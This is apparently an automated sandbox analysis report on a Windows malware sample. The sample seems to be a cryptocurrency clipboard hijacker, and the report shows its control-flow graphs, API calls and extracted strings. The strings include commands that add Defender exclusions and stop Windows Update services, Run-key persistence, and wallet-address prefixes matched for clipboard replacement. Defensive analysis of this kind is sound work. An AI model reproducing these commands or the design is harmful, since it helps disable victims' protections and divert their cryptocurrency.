5823->5825 5824->5825 5826 40a740 7 API calls 5824->5826 5825->5819 5827 401498 CreateEventA socket 5826->5827 5828 4014cf 5827->5828 5833 4014d5 5827->5833 5830 401330 7 API calls 5828->5830 5829 4014e2 htons setsockopt bind 5831 401546 5829->5831 5832 401558 CreateThread 5829->5832 5830->5833 5834 401330 7 API calls 5831->5834 5832->5825 5836 401100 5832->5836 5833->5825 5833->5829 5835 40154c 5834->5835 5835->5819 5837 401115 ioctlsocket 5836->5837 5838 4011e4 5837->5838 5840 40113a 5837->5840 5839 40ab60 _invalid_parameter 3 API calls 5838->5839 5842 4011ea 5839->5842 5841 4011cd WaitForSingleObject 5840->5841 5843 40a990 9 API calls 5840->5843 5844 401168 recvfrom 5840->5844 5845 4011ad InterlockedExchangeAdd 5840->5845 5841->5837 5841->5838 5843->5840 5844->5840 5844->5841 5847 401000 5845->5847 5849 401014 5847->5849 5848 40103b 5858 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5848->5858 5849->5848 5850 40a740 7 API calls 5849->5850 5850->5848 5852 40105b 5859 401580 5852->5859 5854 4010ec 5854->5840 5855 4010a3 IsBadReadPtr 5856 401071 5855->5856 5856->5854 5856->5855 5857 4010d8 memmove 5856->5857 5857->5856 5858->5852 5860 401592 5859->5860 5861 4015a5 memcpy 5859->5861 5862 40a990 9 API calls 5860->5862 5864 4015c1 5861->5864 5863 40159f 5862->5863 5863->5861 5864->5856 6110 40d6b0 6115 40d710 6110->6115 6113 40d6de 6114 40d710 send 6114->6113 6116 40d721 send 6115->6116 6117 40d6c3 6116->6117 6118 40d73e 6116->6118 6117->6113 6117->6114 6118->6116 6118->6117 6119 40d930 6124 40d934 6119->6124 6120 40bbb0 5 API calls 6120->6124 6121 40d950 WaitForSingleObject 6123 40d975 6121->6123 6121->6124 6122 40d550 200 API calls 6122->6124 6124->6120 6124->6121 6124->6122 6124->6123 6125 4059b0 GetWindowLongW 6126 4059d4 6125->6126 6127 4059f6 6125->6127 6128 4059e1 6126->6128 6129 405a67 IsClipboardFormatAvailable 6126->6129 6131 405a46 6127->6131 6132 405a2e SetWindowLongW 6127->6132 6143 4059f1 6127->6143 6135 405a04 SetClipboardViewer SetWindowLongW 6128->6135 6136 4059e7 6128->6136 6133 405a83 IsClipboardFormatAvailable 6129->6133 6134 405a7a 6129->6134 6130 405be4 DefWindowProcA 6137 405a4c SendMessageA 6131->6137 6131->6143 6132->6143 6133->6134 6138 405a98 IsClipboardFormatAvailable 6133->6138 6140 405ab5 OpenClipboard 6134->6140 6141 405b7c 6134->6141 6135->6130 6139 405b9d RegisterRawInputDevices ChangeClipboardChain 6136->6139 6136->6143 6137->6143 6138->6134 6139->6130 6140->6141 6144 405ac5 GetClipboardData 6140->6144 6142 405b85 SendMessageA 6141->6142 6141->6143 6142->6143 6143->6130 6144->6143 6145 405add GlobalLock 6144->6145 6145->6143 6146 405af5 6145->6146 6147 405b08 6146->6147 6148 405b29 6146->6148 6149 405b3e 6147->6149 6150 405b0e 6147->6150 6151 40d250 13 API calls 6148->6151 6166 4057f0 6149->6166 6152 405b14 GlobalUnlock CloseClipboard 6150->6152 6160 405680 6150->6160 6151->6152 6152->6141 6156 405b67 6152->6156 6174 404970 lstrlenW 6156->6174 6159 40ab60 _invalid_parameter 3 API calls 6159->6141 6161 40568b 6160->6161 6162 405691 lstrlenW 6161->6162 6163 4056a4 6161->6163 6164 40a950 __aligned_recalloc_base 7 API calls 6161->6164 6165 4056c1 lstrcpynW 6161->6165 6162->6161 6162->6163 6163->6152 6164->6161 6165->6161 6165->6163 6169 4057fd 6166->6169 6167 405803 lstrlenA 6167->6169 6173 405816 6167->6173 6168 405740 2 API calls 6168->6169 6169->6167 6169->6168 6170 40a950 __aligned_recalloc_base 7 API calls 6169->6170 6172 40ab60 _invalid_parameter 3 API calls 6169->6172 6169->6173 6208 4057a0 6169->6208 6170->6169 6172->6169 6173->6152 6182 4049a4 6174->6182 6175 404bfd 6175->6159 6176 404e81 StrStrW 6177 404e94 6176->6177 6178 404e98 StrStrW 6176->6178 6177->6178 6180 404eab 6178->6180 6181 404eaf StrStrW 6178->6181 6179 404c0f 6179->6175 6179->6176 6180->6181 6183 404ec2 6181->6183 6182->6175 6182->6179 6185 404d90 StrStrW 6182->6185 6192 404ed8 6183->6192 6213 4048a0 lstrlenW 6183->6213 6185->6179 6186 404dbb StrStrW 6185->6186 6186->6179 6187 404de6 StrStrW 6186->6187 6187->6179 6188 4054aa StrStrW 6193 4054c4 StrStrW 6188->6193 6194 4054bd 6188->6194 6189 40544f StrStrW 6190 405462 6189->6190 6191 40546b StrStrW 6189->6191 6190->6188 6191->6190 6197 405487 StrStrW 6191->6197 6192->6175 6192->6188 6192->6189 6195 4054d7 6193->6195 6196 4054de StrStrW 6193->6196 6194->6193 6195->6196 6198 4054f1 6196->6198 6199 4054f8 StrStrW 6196->6199 6197->6190 6198->6199 6200 405512 StrStrW 6199->6200 6201 40550b 6199->6201 6203 405525 lstrlenA 6200->6203 6201->6200 6203->6175 6204 4055ff GlobalAlloc 6203->6204 6204->6175 6205 40561a GlobalLock 6204->6205 6205->6175 6206 40562d memcpy GlobalUnlock OpenClipboard 6205->6206 6206->6175 6207 40565a EmptyClipboard SetClipboardData CloseClipboard 6206->6207 6207->6175 6209 4057ab 6208->6209 6210 4057b1 lstrlenA 6209->6210 6211 405740 2 API calls 6209->6211 6212 4057e4 6209->6212 6210->6209 6211->6209 6212->6169 6214 4048c4 6213->6214 6215 40490d 6214->6215 6216 404911 iswalpha 6214->6216 6217 40492c iswdigit 6214->6217 6215->6192 6216->6214 6216->6217 6217->6214 5865 4084f9 5866 408502 5865->5866 5867 408511 34 API calls 5866->5867 5868 409346 5866->5868 6218 405fbd 6220 405f51 6218->6220 6219 40ab60 _invalid_parameter 3 API calls 6221 405fc8 LeaveCriticalSection 6219->6221 6222 405fa6 memcpy 6220->6222 6223 405fbb 6220->6223 6222->6223 6223->6219 6225 40ac3e 6226 40ab60 _invalid_parameter 3 API calls 6225->6226 6229 40abfd 6226->6229 6227 40ac12 6228 40a950 __aligned_recalloc_base 7 API calls 6228->6229 6229->6227 6229->6228 6230 40ac14 memcpy 6229->6230 6230->6229

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 88 40f1b0-40f1dc GetLocaleInfoA strcmp 89 40f1e2 88->89 90 40f1de-40f1e0 88->90 91 40f1e4-40f1e7 89->91 90->91
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocalestrcmp
                                                                                                                                                                                                      • String ID: UKR
                                                                                                                                                                                                      • API String ID: 3191669094-64918367
                                                                                                                                                                                                      • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                                                                                      Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 49->55 55->54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?), ref: 004079EA
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                                      • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                                      • API String ID: 4172876685-159212852
                                                                                                                                                                                                      • Opcode ID: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                                                                                      • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14d5bbea81be467e13e3765130848305c9d0a11b32ad18c98a91a2c8bc0bfa95
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C
                                                                                                                                                                                                      Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 82 40f400-40f460 memset * 2 CreateProcessW 83 40f471-40f495 ShellExecuteW 82->83 84 40f462-40f46f Sleep 82->84 86 40f4a6 83->86 87 40f497-40f4a4 Sleep 83->87 85 40f4a8-40f4ab 84->85 86->85 87->85
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F40E
                                                                                                                                                                                                      • memset.NTDLL ref: 0040F41E
                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0040F467
                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                      • String ID: $D$open
                                                                                                                                                                                                      • API String ID: 3787208655-2182757814
                                                                                                                                                                                                      • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 92 4068e0-4068f5 _chkstk 93 4068f7-4068f9 92->93 94 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 92->94 95 406f64-406f67 93->95 96 4069d2-4069f3 call 40f1f0 94->96 97 406a14-406a23 PathFileExistsW 94->97 96->97 107 4069f5-406a0e SetFileAttributesW DeleteFileW 96->107 99 406ac4-406acd 97->99 100 406a29-406a38 PathFileExistsW 97->100 101 406af5-406b04 PathFileExistsW 99->101 102 406acf-406ada call 4064a0 99->102 104 406a59-406a68 PathFileExistsW 100->104 105 406a3a-406a53 SetFileAttributesW DeleteFileW 100->105 108 406b06-406b26 call 40f1f0 101->108 109 406b47-406b56 PathFileExistsW 101->109 102->101 120 406adc-406af0 call 40f1f0 102->120 110 406a6a-406a7b CreateDirectoryW 104->110 111 406a8c-406a9b PathFileExistsW 104->111 105->104 107->97 108->109 129 406b28-406b41 SetFileAttributesW DeleteFileW 108->129 115 406b58-406b62 109->115 116 406bca-406bd9 PathFileExistsW 109->116 110->111 114 406a7d-406a86 SetFileAttributesW 110->114 111->99 117 406a9d-406ab3 CopyFileW 111->117 114->111 115->116 122 406b64-406b71 PathFileExistsW 115->122 118 406c75-406c96 FindFirstFileW 116->118 119 406bdf-406bee PathFileExistsW 116->119 117->99 123 406ab5-406abe SetFileAttributesW 117->123 126 406c9c-406d54 118->126 127 406f5e 118->127 124 406bf0-406bf6 119->124 125 406c2c-406c32 119->125 120->101 122->116 130 406b73-406b89 CopyFileW 122->130 123->99 132 406c12-406c27 call 406660 124->132 133 406bf8-406c10 call 406660 124->133 136 406c34-406c4c call 406660 125->136 137 406c4e-406c63 call 406660 125->137 134 406d5e-406d72 lstrcmpW 126->134 127->95 129->109 130->116 131 406b8b-406ba9 SetFileAttributesW PathFileExistsW 130->131 131->116 138 406bab-406bc4 SetFileAttributesW DeleteFileW 131->138 153 406c2a 132->153 133->153 141 406d74-406d88 lstrcmpW 134->141 142 406d8a 134->142 151 406c66-406c6f SetFileAttributesW 136->151 137->151 138->116 141->142 147 406d8f-406da0 141->147 148 406f35-406f4b FindNextFileW 142->148 154 406db1-406db8 147->154 148->134 152 406f51-406f58 FindClose 148->152 151->118 152->127 153->151 155 406de6-406def 154->155 156 406dba-406dd7 lstrcmpiW 154->156 157 406df1 155->157 158 406df6-406e07 155->158 159 406dd9 156->159 160 406ddb-406de2 156->160 157->148 161 406e18-406e1f 158->161 159->154 160->155 163 406e21-406e3e PathMatchSpecW 161->163 164 406e8f-406e98 161->164 165 406e40 163->165 166 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 163->166 167 406e9a 164->167 168 406e9f-406eae PathFileExistsW 164->168 165->161 166->164 167->148 170 406eb0 168->170 171 406eb5-406f05 wsprintfW * 2 168->171 170->148 172 406f07-406f1d call 4067a0 171->172 173 406f1f-406f2f MoveFileExW 171->173 172->148 173->148
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                                      • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                                      • API String ID: 495142193-638321828
                                                                                                                                                                                                      • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                                                                                      Function 00404970 Relevance: 71.0, APIs: 24, Strings: 16, Instructions: 989clipboardstringmemoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D99
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404DC4
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,addr), ref: 00404DEF
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404E8A
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,ronin:), ref: 00404EA1
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,nano_), ref: 00404EB8
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bnb), ref: 00405458
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bc1p), ref: 00405474
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bc1q), ref: 00405490
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,ronin:), ref: 004054B3
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 004054CD
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,cosmos), ref: 004054E7
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,addr), ref: 00405501
                                                                                                                                                                                                      • StrStrW.SHLWAPI(00000000,nano_), ref: 0040551B
                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004055F0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 0040560B
                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0040561E
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,-00000001), ref: 0040563C
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405648
                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405650
                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040565A
                                                                                                                                                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405666
                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040566C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockmemcpy
                                                                                                                                                                                                      • String ID: 8$addr$addr$bc1p$bc1q$bitcoincash:$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$hA$nano_$nano_$ronin:$ronin:
                                                                                                                                                                                                      • API String ID: 2017104846-250561147
                                                                                                                                                                                                      • Opcode ID: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                                                                                      • Instruction ID: 6e0617124f46e3e1bef08e4e409f6ed46b9961a6860853f8336ff2275e542cf2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25dea65d1d4449a2ef1eae01c065bfd0f7a4c4a1741e3957523323aa1ae31655
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 609237B0A04218EACF58CF41C0945BE7BB2AF82751F60C06BE9456F294C77D8EC1DB99
                                                                                                                                                                                                      Function 004084D0 Relevance: 62.3, APIs: 34, Strings: 1, Instructions: 1037COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl_aullshr
                                                                                                                                                                                                      • String ID: Y
                                                                                                                                                                                                      • API String ID: 673498613-3233089245
                                                                                                                                                                                                      • Opcode ID: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                                                                                      • Instruction ID: 8bc4f449e96fa991b651f766feedb24339ddc98edc011673b3c5a2d60d79d6a0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 535b8406bbf27203a3d06f507e019bd4b957b803c50952899959f8368776a3e9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D23A79D11619EFCB54CF99C18099EFBF1FF88320F62859AD845AB305C630AA95DF80
